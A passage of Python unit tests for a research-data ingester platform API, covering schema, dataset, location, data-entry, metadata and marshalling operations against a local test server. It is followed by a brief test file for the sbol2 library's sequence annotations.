self.auth = CredentialsAuthentication("casey", "password")
self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
self.schemas = []
def compare_schema_attrs(self, attrs_src, attrs_dst):
# make a copy
attrs_dst = attrs_dst.copy()
for attr in attrs_src:
found = False
for attr_dst in attrs_dst:
if attr in attrs_dst:
del attrs_dst[attr]
found = True
break
self.assertTrue(found, "Attribute not found "+attr)
self.assertEquals(0, len(attrs_dst), "Extra attributes in destination")
def test_data_metadata(self):
work = self.ingester_platform.createUnitOfWork()
schema = DataEntryMetadataSchema("Quality Assurance")
schema.addAttr(Double("value"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
ingested_schema = self.ingester_platform.getSchema(schema.id)
self.compare_schema_attrs(ingested_schema.attrs, schema.attrs)
self.assertEquals(ingested_schema.name, schema.name)
def test_dataset_metadata(self):
work = self.ingester_platform.createUnitOfWork()
schema = DatasetMetadataSchema("Dataset Calibration")
schema.addAttr(DateTime("date"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
ingested_schema = self.ingester_platform.getSchema(schema.id)
self.compare_schema_attrs(ingested_schema.attrs, schema.attrs)
self.assertEquals(ingested_schema.name, schema.name)
def test_data(self):
work = self.ingester_platform.createUnitOfWork()
schema = DataEntrySchema("Test123")
schema.addAttr(Double("value"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
ingested_schema = self.ingester_platform.getSchema(schema.id)
self.compare_schema_attrs(ingested_schema.attrs, schema.attrs)
self.assertEquals(ingested_schema.name, schema.name)
def test_dup_data(self):
work = self.ingester_platform.createUnitOfWork()
schema = DataEntrySchema("Test123")
schema.addAttr(Double("value"))
schema.addAttr(String("description"))
work.post(schema)
work.commit()
self.schemas.append(schema)
def test_delete(self):
work = self.ingester_platform.createUnitOfWork()
for schema in self.schemas:
work.delete(schema)
work.commit()
for schema in self.schemas:
self.assertIsNone(self.ingester_platform.getSchema(schema.id))
def tearDown(self):
self.ingester_platform.close()
class ProvisioningInterfaceTest(unittest.TestCase):
"""
This test defines and checks that the Ingester API works the way the provisioning interface expects.
"""
def setUp(self):
self.auth = CredentialsAuthentication("casey", "password")
self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
self.cleanup_files = []
def test_api_usage(self):
# User data that is created by filling out the provisioning interface workflow steps.
# General
title = "Test project"
data_manager = "A Person"
project_lead = "Another Person"
# Metadata
project_region = Region("Test Region", ((1, 1), (2, 2),(2,1), (1,1)))
# Methods & Datasets
loc1 = Location(11.0, 11.0, "Test Site", 100)
loc2 = Location(11.0, 11.0, "Test Site", 100)
loc3 = Location(12.0, 11.0, "Test Site", 100)
temp_work = self.ingester_platform.createUnitOfWork()
temperature_schema = DataEntrySchema("Test Temp Schema")
temperature_schema.addAttr(Double("temperature"))
temp_work.post(temperature_schema)
temp_work.commit()
air_temperature_schema = DataEntrySchema("Air Temp Schema")
air_temperature_schema.extends = [temperature_schema.id]
air_temperature_schema = self.ingester_platform.post(air_temperature_schema)
second_level_inheritence_schema = DataEntrySchema("Second Inheritence")
second_level_inheritence_schema.extends = [air_temperature_schema.id]
second_level_inheritence_schema = self.ingester_platform.post(second_level_inheritence_schema)
# Check the name is set
temperature_schema_1 = self.ingester_platform.getSchema(temperature_schema.id)
self.assertIsNotNone(temperature_schema.name)
self.assertEquals(temperature_schema.name, temperature_schema_1.name)
file_schema = DataEntrySchema()
file_schema.addAttr(FileDataType("file"))
file_schema = self.ingester_platform.post(file_schema)
dataset1 = Dataset(location=None, schema=temperature_schema.id)
dataset2 = Dataset(location=None, schema=file_schema.id, data_source=PullDataSource("http://test.com", "file_handle", processing_script="file://d:/processing_scripts/awsome_processing.py"))
# dataset3 = Dataset(None, file_schema, PullDataSource("http://test.com", "file_handle"), CustomSampling("file://d:/sampling_scripts/awsome_sampling.py"), "file://d:/processing_scripts/awsome_processing.py")
self.cleanup_files.append(dataset2.data_source.processing_script)
# self.cleanup_files.push(dataset3.sampling.script)
# self.cleanup_files.push(dataset3.processing_script)
# Provisioning admin accepts the submitted project
work = self.ingester_platform.createUnitOfWork()
work.post(project_region) # Save the region
loc1.region = project_region.id # Set the datasets location to use the projects region
work.post(loc1) # Save the location
dataset1.location = loc1.id # Set the datasets location
work.post(dataset1) # Save the dataset
loc2.region = project_region.id
work.post(loc2)
dataset2.location = loc2.id
work.post(dataset2)
work.commit()
# Region, location and dataset id's will be saved to the project within the provisioning system in some way
# User searches for datasets
# TODO: Nigel? - Define searching api
found_dataset_id = dataset1.id # The dataset that has an extended file schema
# User manually enters data
timestamp = datetime.datetime.now()
data_entry_1 = DataEntry(found_dataset_id, timestamp)
data_entry_1['temperature'] = 27.8 # Add the extended schema items
data_entry_1 = self.ingester_platform.post(data_entry_1)
self.assertIsNotNone(data_entry_1.id)
timestamp2 = timestamp + datetime.timedelta(seconds=1)
data_entry_2 = DataEntry(found_dataset_id, timestamp2)
data_entry_2['temperature'] = 27.8 # Add the extended schema items
data_entry_2 = self.ingester_platform.post(data_entry_2)
self.assertEquals(2, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 0, 10).results))
result = self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 0, 1)
self.assertEquals(2, result.count)
self.assertEquals(1, len(result.results))
self.assertEquals(1, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 1, 1).results))
result = self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id), 2, 1)
self.assertEquals(0, len(result.results))
self.assertEquals(0, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id,
end_time=timestamp-datetime.timedelta(seconds=60)), 0, 10).results))
self.assertEquals(0, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id,
start_time=timestamp+datetime.timedelta(seconds=60)), 0, 10).results))
self.assertEquals(2, len(self.ingester_platform.search(DataEntrySearchCriteria(found_dataset_id,
start_time=timestamp-datetime.timedelta(seconds=60),
end_time=timestamp+datetime.timedelta(seconds=60)), 0, 10).results))
work = self.ingester_platform.createUnitOfWork()
data_entry_3 = DataEntry(dataset2.id, datetime.datetime.now())
data_entry_3['file'] = FileObject(f_handle=open(os.path.join(
os.path.dirname(jcudc24ingesterapi.__file__), "tests/test_ingest.xml")),
mime_type="text/xml")
work.post(data_entry_3)
work.commit()
self.assertIsNotNone(data_entry_3.id)
f_in = self.ingester_platform.getDataEntryStream(dataset2.id, data_entry_3.id, "file")
self.assertIsNotNone(f_in)
data = f_in.read()
f_in.close()
self.assertLess(0, len(data), "Expected data in file")
# User enters quality assurance metadata
quality_metadata_schema = DatasetMetadataSchema()
quality_metadata_schema.addAttr(String("unit"))
quality_metadata_schema.addAttr(String("description"))
quality_metadata_schema.addAttr(Double("value"))
quality_metadata_schema = self.ingester_platform.post(quality_metadata_schema)
entered_metadata = DatasetMetadataEntry(data_entry_1.dataset, quality_metadata_schema.id)
entered_metadata['unit'] = "%"
entered_metadata['description'] = "Percent error"
entered_metadata['value'] = 0.98
entered_metadata = self.ingester_platform.post(entered_metadata)
# Now find that metadata
results = self.ingester_platform.search(DatasetMetadataSearchCriteria(data_entry_1.dataset),0 , 10).results
self.assertEqual(1, len(results))
data_entry_md_schema = DataEntryMetadataSchema("test")
data_entry_md_schema.addAttr(String("description"))
data_entry_md_schema.addAttr(Double("value"))
data_entry_md_schema = self.ingester_platform.post(data_entry_md_schema)
calibration = DataEntryMetadataEntry(metadata_schema_id=int(data_entry_md_schema.id), dataset_id=dataset2.id, object_id=data_entry_3.id)
calibration["description"] = "Test"
calibration["value"] = 1.2
calibration2 = DataEntryMetadataEntry(metadata_schema_id=int(data_entry_md_schema.id), dataset_id=dataset2.id, object_id=data_entry_3.id)
calibration2["description"] = "Test2"
calibration2["value"] = 2.3
calibration2 = self.ingester_platform.post(calibration2)
calibrations = self.ingester_platform.search(DataEntryMetadataSearchCriteria(int(81), int(3648)), offset=0, limit=1000)
self.assertEquals(1, len(calibrations.results))
self.assertEquals(calibrations.results[0].schema_id, data_entry_md_schema.id)
self.ingester_platform.delete(calibration2)
self.ingester_platform.delete(calibration)
self.ingester_platform.delete(data_entry_md_schema)
# User changes sampling rate
# FIXME: This test is going to be changed to be done by editing the dataset
# sampling_rate_changed = Metadata(dataset1.id, type(dataset1), SampleRateMetadataSchema())
# sampling_rate_changed.change_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
# sampling_rate_changed.sampling = CustomSampling("file://d:/sampling_scripts/awsome_sampling.py")
#
# try:
# sampling_rate_changed = self.ingester_platform.post(sampling_rate_changed)
# assert(sampling_rate_changed.metadata_id is None, "Sampling rate change failed")
# except:
# assert(True, "Sampling rate change failed")
# User wants some random metadata specific to their project
# FIXME: Not sure what use case this is trying to demonstrate
# random_metadata_schema = DataEntryMetadataSchema()
# random_metadata_schema.addAttr('random_field', Double())
# random_metadata = Metadata(data_entry.data_entry_id, type(data_entry), random_metadata_schema)
# random_metadata.random_field = 1.5
# try:
# random_metadata = self.ingester_platform.post(random_metadata)
# assert(random_metadata.metadata_id is None, "random_metadata failed")
# except:
# assert(True, "random_metadata failed")
# User changes the data source of the dataset
new_data_source = PullDataSource("http://test.com/new_data", "file_handle")
dataset1.data_source = new_data_source
dataset1 = self.ingester_platform.post(dataset1)
self.assertNotEqual(None, dataset1)
# External, 3rd party searches for data
# TODO: external 3rd parties should be able to use the api to get data without authentication
# TODO: I'm not sure exactly how this should work, but the search api could be open access (need spam limitations or something?)
# Project is disabled/finished
work = self.ingester_platform.createUnitOfWork()
work.disable(dataset1.id)
work.disable(dataset2.id)
work.commit()
# Project is obsolete and data should be deleted
work = self.ingester_platform.createUnitOfWork()
work.delete(dataset1.id)
work.delete(dataset2.id)
work.commit()
def test_parent_schemas(self):
"""This test creates a nested schema with attributes provided at 2
different levels. A data entry is saved, and then retrieved, and the
values tested.
"""
loc1 = self.ingester_platform.post(Location(11.0, 11.0, "Test Site", 100))
temp_work = self.ingester_platform.createUnitOfWork()
temperature_schema = DataEntrySchema("Test Temp Schema")
temperature_schema.addAttr(Double("temperature"))
temp_work.post(temperature_schema)
temp_work.commit()
air_temperature_schema = DataEntrySchema("Air Temp Schema")
air_temperature_schema.extends = [temperature_schema.id]
air_temperature_schema = self.ingester_platform.post(air_temperature_schema)
instrument_schema = DataEntrySchema("Instrument Schema")
instrument_schema.extends = [air_temperature_schema.id]
instrument_schema.addAttr(Double("var2"))
instrument_schema = self.ingester_platform.post(instrument_schema)
dataset = Dataset(location=loc1.id, schema=instrument_schema.id)
dataset = self.ingester_platform.post(dataset)
work = self.ingester_platform.createUnitOfWork()
data_entry = DataEntry(dataset.id, datetime.datetime.now())
data_entry["temperature"] = 10
data_entry["var2"] = 11
work.post(data_entry)
work.commit()
data_entry_ret = self.ingester_platform.getDataEntry(dataset.id, data_entry.id)
self.assertEquals(data_entry["temperature"], data_entry_ret["temperature"])
self.assertEquals(data_entry["var2"], data_entry_ret["var2"])
def testMultiDatasetExtraction(self):
"""This test demonstrates use case #402.
There are 2 datasets created, the first holds a datafile, and has a pull ingest occurring, along with
a configured custom script. The second dataset holds observation data, that will be extracted from the
datafile in the first dataset.
"""
temperature_schema = DataEntrySchema()
temperature_schema.addAttr(Double("Temperature"))
temperature_schema = self.ingester_platform.post(temperature_schema)
file_schema = DataEntrySchema()
file_schema.addAttr(FileDataType("file"))
file_schema = self.ingester_platform.post(file_schema)
location = self.ingester_platform.post(Location(10.0, 11.0, "Test Site", 100))
temp_dataset = Dataset(location=None, schema=temperature_schema.id)
file_dataset = Dataset(location=None, schema=file_schema.id, data_source=PullDataSource("http://test.com", "file_handle", processing_script="file://d:/processing_scripts/awsome_processing.py"))
def test_listeners(self):
# Use a list to beat the closure
called = [False]
def loc_listener(obj, var, value):
# The listener will be called when the object is posted
# and when it is committed, so we want to filter out the
# post call
if var == "_id" and value > 0:
called.remove(False)
called.append(True)
loc = Location()
loc.name = "Test Loc1"
loc.set_listener(loc_listener)
work = self.ingester_platform.createUnitOfWork()
work.post(loc)
work.commit()
self.assertTrue(called[0])
def tearDown(self):
self.ingester_platform.reset()
for f in self.cleanup_files:
try:
os.remove(f)
except:
print "failed to remove file: " + f
class TestIngesterModels(unittest.TestCase):
def test_authentication(self):
pass
def test_ingester_exceptions(self):
pass
def test_listeners(self):
# Use a list to beat the closure
called = [False]
def loc_listener(obj, var, value):
called.remove(False)
called.append(True)
self.assertEquals("_id", var)
self.assertEquals(1, value)
loc = Location()
loc.set_listener(loc_listener)
loc.id = 1
self.assertTrue(called[0])
# def test_ingester_platform(self):
# self.ingester_platform = IngesterPlatformAPI()
# dataset = self.ingester_platform.post(self.auth, self.dataset)
# self.assertTrue(dataset is set, "Failed to add dataset to ingester API")
# self.assertTrue(dataset.dataset_id is set and dataset.dataset_id >= 0,
# "Ingester API returned dataset with invalid dataset_id")
# self.dataset = dataset
#
# data_entry = self.ingester_platform.post(self.auth, self.data_entry)
# self.assertTrue(data_entry is set, "Failed to add data_entry to ingester API")
# self.assertTrue(data_entry.data_entry_id is set and data_entry.data_entry_id >= 0,
# "Ingester API returned data_entry with invalid data_entry_id")
# self.data_entry = data_entry
#
# datasets = self.ingester_platform.get(self.auth, Dataset()) # Get all datasets
# self.assertTrue(len(datasets) > 0, "Ingester API failed to insert dataset")
# self.assertIn(self.dataset, datasets, "Ingester API didn't return the inserted dataset")
#
# data_quality = Metadata(self.data_entry, QualityMetadataSchema(), {"description": "Sensor was moved", "value": 0})
# stored_data_quality = self.ingester_platform.post(self.auth, data_quality)
# self.assertEquals(data_quality, stored_data_quality)
#
# sampling_rate = Metadata(self.dataset, SampleRateMetadataSchema(), {"sampling": PeriodicSampling()})
#
# location_elevation_type = Metadata(self.location, NoteMetadataSchema(),
# {"name": "Elevation type", "text": "Height above ground"})
def test_ingester_scripts(self):
pass
class TestIngesterPersistence(unittest.TestCase):
"""This set of tests checks that the CRUD functionality works as expected
"""
def setUp(self):
self.auth = CredentialsAuthentication("casey", "password")
self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
self.cleanup_files = []
def test_region_persistence(self):
project_region = Region("Test Region", ((1, 1), (2, 2),(2,1), (1,1)))
project_region1 = self.ingester_platform.post(project_region)
self.assertNotEqual(project_region1.id, None, "ID should have been set")
def test_location_persistence(self):
loc = Location(10.0, 11.0, "Test Site", 100, None)
loc1 = self.ingester_platform.post(loc)
self.assertNotEqual(loc1.id, None, "ID should have been set")
self.assertEqual(loc.latitude, loc1.latitude, "latitude does not match")
self.assertEqual(loc.longitude, loc1.longitude, "longitude does not match")
self.assertEqual(loc.elevation, loc1.elevation, "elevation does not match")
self.assertEqual(loc.name, loc1.name, "name does not match")
locs = self.ingester_platform.search(LocationSearchCriteria(),0 , 10).results
self.assertEquals(1, len(locs))
# Now update the location
loc1.name = "The Test Site"
loc1.latitude = -19.0
# Test that the version check is observed
self.assertEquals(1, loc1.version)
loc1.version = 0
self.assertRaises(StaleObjectError, self.ingester_platform.post, loc1)
loc1.version = 1
loc2 = self.ingester_platform.post(loc1)
self.assertEqual(loc1.id, loc2.id, "")
self.assertEqual(loc1.latitude, loc2.latitude, "latitude does not match")
self.assertEqual(loc1.longitude, loc2.longitude, "longitude does not match")
self.assertEqual(loc1.elevation, loc2.elevation, "elevation does not match")
self.assertEqual(loc1.name, loc2.name, "name does not match")
def test_dataset_persistence(self):
loc = Location(10.0, 11.0, "Test Site", 100, None)
loc = self.ingester_platform.post(loc)
self.assertIsNotNone(loc, "Location should not be none")
self.assertIsNotNone(loc.id, "Location should not be none")
file_schema = DataEntrySchema()
file_schema.addAttr(FileDataType("file"))
file_schema = self.ingester_platform.post(file_schema)
script_contents = """Some Script
More"""
dataset = Dataset(location=loc.id, schema=file_schema.id, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file", processing_script=script_contents), location_offset=LocationOffset(0, 1, 2))
dataset1 = self.ingester_platform.post(dataset)
self.assertIsNotNone(dataset1, "Dataset should not be none")
self.assertEquals(dataset1.location, dataset.location, "Location ID does not match")
self.assertEquals(dataset1.schema, dataset.schema, "schema does not match %d!=%d"%(dataset1.schema, dataset.schema))
self.assertEquals(dataset1.location_offset.x, 0)
self.assertEquals(dataset1.location_offset.y, 1)
self.assertEquals(dataset1.location_offset.z, 2)
self.assertEquals(script_contents, dataset1.data_source.processing_script)
datasets = self.ingester_platform.findDatasets()
self.assertEquals(1, len(datasets))
datasets = self.ingester_platform.findDatasets(location=loc.id)
self.assertEquals(1, len(datasets))
data_entry_schemas = self.ingester_platform.search(DataEntrySchemaSearchCriteria(),0 , 10).results
self.assertEquals(1, len(data_entry_schemas))
datasets = self.ingester_platform.search(DatasetSearchCriteria(),0 , 10).results
self.assertEquals(1, len(datasets))
def test_schema_persistence(self):
file_schema = DataEntrySchema()
file_schema.addAttr(FileDataType("file"))
self.ingester_platform.post(file_schema)
def test_unit_of_work_persistence(self):
unit = self.ingester_platform.createUnitOfWork()
loc = Location(10.0, 11.0, "Test Site", 100, None)
unit.insert(loc)
self.assertIsNotNone(loc.id)
file_schema = DataEntrySchema()
file_schema.name = "File Schema"
file_schema.addAttr(FileDataType("file"))
file_schema_id = unit.insert(file_schema)
self.assertIsNotNone(file_schema_id, "Schema ID should not be null")
dataset = Dataset(location=loc.id, schema=file_schema.id, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file"))
unit.insert(dataset)
# Persist all the objects
unit.commit()
self.assertIsNotNone(loc, "Location should not be none")
self.assertIsNotNone(loc.id, "Location should not be none")
self.assertGreater(loc.id, 0, "Location ID not real")
self.assertEqual(loc.name, "Test Site", "Location name doesn't match")
self.assertIsNotNone(dataset, "dataset should not be none")
self.assertIsNotNone(dataset.id, "dataset should not be none")
self.assertGreater(dataset.id, 0, "dataset ID not real")
def tearDown(self):
self.ingester_platform.reset()
class TestIngesterFunctionality(unittest.TestCase):
"""This set of tests test the actual functioning of the service.
"""
def setUp(self):
self.auth = CredentialsAuthentication("casey", "password")
self.ingester_platform = IngesterPlatformAPI("http://localhost:8080/api", self.auth)
self.cleanup_files = []
def test_pull_ingest_functionality(self):
loc = Location(10.0, 11.0, "Test Site", 100, None)
loc = self.ingester_platform.post(loc)
file_schema = DataEntrySchema()
file_schema.addAttr(FileDataType("file"))
file_schema = self.ingester_platform.post(file_schema)
dataset = Dataset(location=loc.id, schema=file_schema.id, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file", sampling=PeriodicSampling(10000)))
dataset1 = self.ingester_platform.post(dataset)
self.assertEquals(dataset1.location, dataset.location, "Location ID does not match")
self.assertEquals(dataset1.schema, dataset.schema, "schema does not match")
self.ingester_platform.disableDataset(dataset1.id)
dataset1a = self.ingester_platform.getDataset(dataset1.id)
self.assertEquals(dataset1a.enabled, False)
def tearDown(self):
self.ingester_platform.reset()
#class TestProjectFunctionality(unittest.TestCase):
# #---------------Create example data---------------
# def setUp(self):
# self.auth = CredentialsAuthentication("casey", "password")
# self.ingester_platform = IngesterPlatformAPI("http://localhost:8080", self.auth)
# self.cleanup_files = []
#
# def test_connection(self):
# result = self.ingester_platform.ping()
# self.assertEquals(result, "PONG", "Could not ping service")
#
# def test_ingest_functionality(self):
# self.region = Region(
# "Queensland",
# [(2314, 1234), (1234, 1234), (1234, 1234), (1234, 2134)]
# )
#
# self.location = Location(1234, 1234, "Example Point", 1.5, self.region)
#
# self.data_type = FileDataType()
# self.data_type.extra_data_example = BOOLEAN()
#
# self.script_handle = os.path.join(tempfile.gettempdir(), 'test_script_file.py')
# self.cleanup_files.append(self.script_handle)
#
# script = "class TestProcessingScript(_ProcessingScript):"\
# " def process_it(self, data_entry):"\
# " assertIsInstance(data_entry, FileDataType)"\
# " return {data_entry, DataEntry(data_entry.dataset, data_entry.data_type_schema, data_entry.datetime, {'processed':True})}"\
# ""
# script_file = open(self.script_handle, 'w')
# script_file.write(script)
#
# self.dataset = Dataset(self.location, self.data_type, PushDataSource(sampling_script), self.script_handle)
#
# self.data_entry = DataEntry(self.dataset, FileDataType(), 123456789,
# {"mime_type": "text/xml", "file_handle": "c:/test.xml", "extra_data_example": False})
#
# self.data_quality = Metadata(self.data_entry, QualityMetadataSchema(),
# {"description": "The entered data was invalid."})
# self.dataset_sampling_changed = Metadata(self.dataset, SampleRateMetadataSchema(),
# {"change_time": datetime.today(), "sampling": PeriodicSampling(1000)})
# # Datasets
# try:
# # Add a dataset
# self.dataset = self.ingester_platform.post(self.dataset)
#
# # Update the dataset with a ReDBox link after the metadata is entered.
# self.dataset.redbox_link = "https://eresearch.jcu.edu.au/researchdata/123456789" # After entry into ReDBox
# self.dataset = self.ingester_platform.post(self.dataset)
#
# # Change the sampling rate of the dataset
# self.dataset = self.ingester_platform.post(self.dataset_sampling_changed)
#
# # Add a manual data entry
# self.data_entry = self.ingester_platform.post(self.data_entry)
#
# # Provide quality information on the data_entry
# self.data_entry = self.ingester_platform.post(self.data_quality)
#
# # Example of searching a range
# start_search_id_range = DataEntry(data_entry_id=0)
# start_search_id_range = DataEntry(data_entry_id=self.data_entry.data_entry_id)
# found_data_entries = self.ingester_platform.get(start_search_id_range, start_search_id_range)
# found = False
# for data_entry in found_data_entries:
# if data_entry == self.data_entry:
# # Delete the data_entry
# found = True
# self.assertTrue(found, "id range search failed")
#
# a_data_entry = DataEntry(kwargs={"extra_data_example": False})
# data_entry = self.ingester_platform.get(DataEntry)
# self.ingester_platform.delete(self.auth, self.data_entry)
#
# # Get all datasets at the location
# location_search = Dataset(self.location, None, None)
# found_datasets = self.ingester_platform.get(location_search)
# found = False
# for dataset in found_datasets:
# if dataset == self.dataset:
# # Delete the dataset
# self.ingester_platform.delete(self.auth, self.dataset)
# found = True
# self.assertTrue(found, "location search failed")
#
# except UnsupportedSchemaError:
# assert True, "The data_type schema was an unknown type (this should never happen except under development"
#
# except InvalidObjectError:
# assert True, "Will occur if the model is invalid due to a not set required field or fields that are set "\
# "incorrectly (eg. data_schema is missing, location is an integer instead of a location object)"
# except UnknownObjectError:
# assert True, "Will occur if a non-ingester model object is posted. (eg. data_entry, dataset, location or metadata "\
# "are valid - sampling, data_sources or any other object are not)."
# except AuthenticationError:
# assert True, "The ingester API couldn't authenticate."
# except ValueError:
# assert True, "Any parameter that has an invalid value such as location.location_id isn't set"
# except:
# assert True, "Any other run time error that the ingester platform throws."
#
# def tearDown(self):
# self.ingester_platform.reset()
# for f_name in self.cleanup_files:
# if os.path.exists(f_name):
# try:
# os.remove(f_name)
# except:
# print "Exception: ", str(sys.exc_info())
class TestMarshaller(unittest.TestCase):
"""Test marshalling and object round tripping"""
def setUp(self):
unittest.TestCase.setUp(self)
self.marshaller = Marshaller()
def test_schema_attributes(self):
schema = DataEntryMetadataSchema()
schema.addAttr(Double("one"))
schema.addAttr(String("two"))
self.assertEquals("one", schema.attrs["one"].name)
self.assertEquals("two", schema.attrs["two"].name)
self.assertTrue(isinstance(schema.attrs["one"], Double))
self.assertTrue(isinstance(schema.attrs["two"], String))
schema_dict = self.marshaller.obj_to_dict(schema)
schema_obj = self.marshaller.dict_to_obj(schema_dict)
self.assertEquals("one", schema_obj.attrs["one"].name)
self.assertEquals("two", schema_obj.attrs["two"].name)
self.assertTrue(isinstance(schema_obj.attrs["one"], Double))
self.assertTrue(isinstance(schema_obj.attrs["two"], String))
def test_dataset_roundtrip(self):
"""Attempt to round trip a dataset object"""
script_contents = """Some Script
More"""
dataset = Dataset(location=1, schema=2, data_source=PullDataSource("http://www.bom.gov.au/radar/IDR733.gif", "file", processing_script=script_contents), location_offset=LocationOffset(0, 1, 2))
dataset_dict = self.marshaller.obj_to_dict(dataset)
dataset1 = self.marshaller.dict_to_obj(dataset_dict)
self.assertIsNotNone(dataset1, "Dataset should not be none")
self.assertEquals(dataset1.location, dataset.location, "Location ID does not match")
self.assertEquals(dataset1.schema, dataset.schema, "schema does not match %d!=%d"%(dataset1.schema, dataset.schema))
self.assertEquals(dataset1.location_offset.x, 0)
self.assertEquals(dataset1.location_offset.y, 1)
self.assertEquals(dataset1.location_offset.z, 2)
def test_data_entry(self):
dt = datetime.datetime.utcfromtimestamp(1357788112)
dt = dt.replace(tzinfo = jcudc24ingesterapi.UTC)
data_entry = DataEntry(1, dt)
data_entry["temp"] = 1.2
data_entry_dto = self.marshaller.obj_to_dict(data_entry)
self.assertEquals("2013-01-10T03:21:52.000Z", data_entry_dto["timestamp"])
self.assertEquals(1, data_entry_dto["dataset"])
self.assertEquals(1.2, data_entry_dto["data"]["temp"])
data_entry_return = self.marshaller.dict_to_obj(data_entry_dto)
self.assertEquals(data_entry.timestamp, data_entry_return.timestamp)
self.assertEquals(data_entry.dataset, data_entry_return.dataset)
self.assertEquals(data_entry.data["temp"], data_entry_return.data["temp"])
def test_file_object_roundtrip(self):
"""The file object should marshall everything but the file stream"""
data_entry = DataEntry(1)
data_entry["temp"] = FileObject(f_path=os.path.join(
os.path.dirname(jcudc24ingesterapi.__file__), "tests/test_ingest.xml"), mime_type="text/xml")
data_entry_dto = self.marshaller.obj_to_dict(data_entry)
self.assertEqual("text/xml", data_entry_dto["data"]["temp"]["mime_type"])
data_entry_domain = self.marshaller.dict_to_obj(data_entry_dto)
self.assertEqual("text/xml", data_entry_domain["temp"].mime_type)
def test_unit_of_work_roundtrip(self):
unit = UnitOfWork(None)
loc = Location(10, 11)
loc.name = "Loc 1"
unit.insert(loc)
unit_dict = self.marshaller.obj_to_dict(unit)
self.assertEquals("unit_of_work", unit_dict["class"])
unit2 = self.marshaller.dict_to_obj(unit_dict)
self.assertEquals(10.0, unit2._to_insert[0].latitude)
self.assertEquals(11.0, unit2._to_insert[0].longitude)
def test_special_attr(self):
loc = Location(10, 11)
loc.correlationid = -1
loc_dict = self.marshaller.obj_to_dict([loc], special_attrs=["correlationid"])
self.assertEquals(1, len(loc_dict))
self.assertEquals(-1, loc_dict[0]["correlationid"])
def test_unit_of_work_validation(self):
unit = UnitOfWork(None)
loc = Location(10, 11)
self.assertRaises(InvalidObjectError, unit.insert, loc)
loc.name = "test"
unit.insert(loc) # Should work now.
def test_marshaller_data_entry_schema(self):
schema = {'attributes': [{'units': None, 'description': None, 'name': 'file', 'class': 'file'}], 'id': None, 'class': 'data_entry_schema'}
schema = self.marshaller.dict_to_obj(schema)
if __name__ == '__main__':
unittest.main()
|
import unittest
import sbol2
class TestSequenceAnnotation(unittest.TestCase):
def test_add_remove_role(self):
sa = sbol2.SequenceAnnotation()
self.assertEqual([], sa.roles)
sa.addRole(sbol2.SO_PROMOTER)
self.assertEqual([sbol2.SO_PROMOTER], sa.roles)
sa.addRole(sbol2.SO_MISC)
self.assertEqual([sbol2.SO_PROMOTER, sbol2.SO_MISC], sa.roles)
sa.addRole(sbol2.SO_CDS)
self.assertEqual([sbol2.SO_PROMOTER, sbol2.SO_MISC, sbol2.SO_CDS], sa.roles)
sa.removeRole(1)
self.assertEqual([sbol2.SO_PROMOTER, sbol2.SO_CDS], sa.roles)
def test_component(self):
cd = sbol2.ComponentDefinition('cd')
sa = cd.sequenceAnnotations.create('sa')
c = cd.components.create('c')
sa.component = c
self.assertEqual(sa.component, c.identity)
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.